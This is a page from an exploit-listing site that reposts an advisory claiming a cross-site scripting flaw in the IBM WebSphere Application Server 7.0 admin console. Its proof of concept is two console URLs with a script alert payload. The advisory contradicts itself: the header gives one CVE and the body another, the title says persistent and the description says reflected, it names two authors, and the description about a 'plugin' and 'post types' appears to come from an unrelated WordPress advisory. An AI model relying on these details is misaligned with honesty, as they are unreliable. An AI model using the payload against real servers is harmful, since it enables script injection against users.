Advertisement






IBM Websphere Application Server 7.0 Cross Site Scripting

CVE Category Price Severity
CVE-2012-2177 CWE-79 Not disclosed High
Author Risk Exploitation Type Date
Santux High Remote 2022-12-05
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022120010

Below is a copy:

IBM Websphere Application Server 7.0 Cross Site Scripting
# Exploit Title: IBM Websphere Application Server 7.0 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2022-12-02
# Author: Milad karimi
# Software Link: https://www.ibm.com/support/pages/6107-websphere-application-server-v61-fix-pack-7-windows
# Version: 7.0
# Tested on: Windows 10
# CVE: 2009-0855

1. Description:
This plugin creates a IBM Websphere Application Server from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
http://www.example.com/ibm/console/<script>alert('Ex3ptionaL_XSS')</script>
http://www.example.com/ibm/console/<script>alert('Ex3ptionaL_XSS')</script>.jsp

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.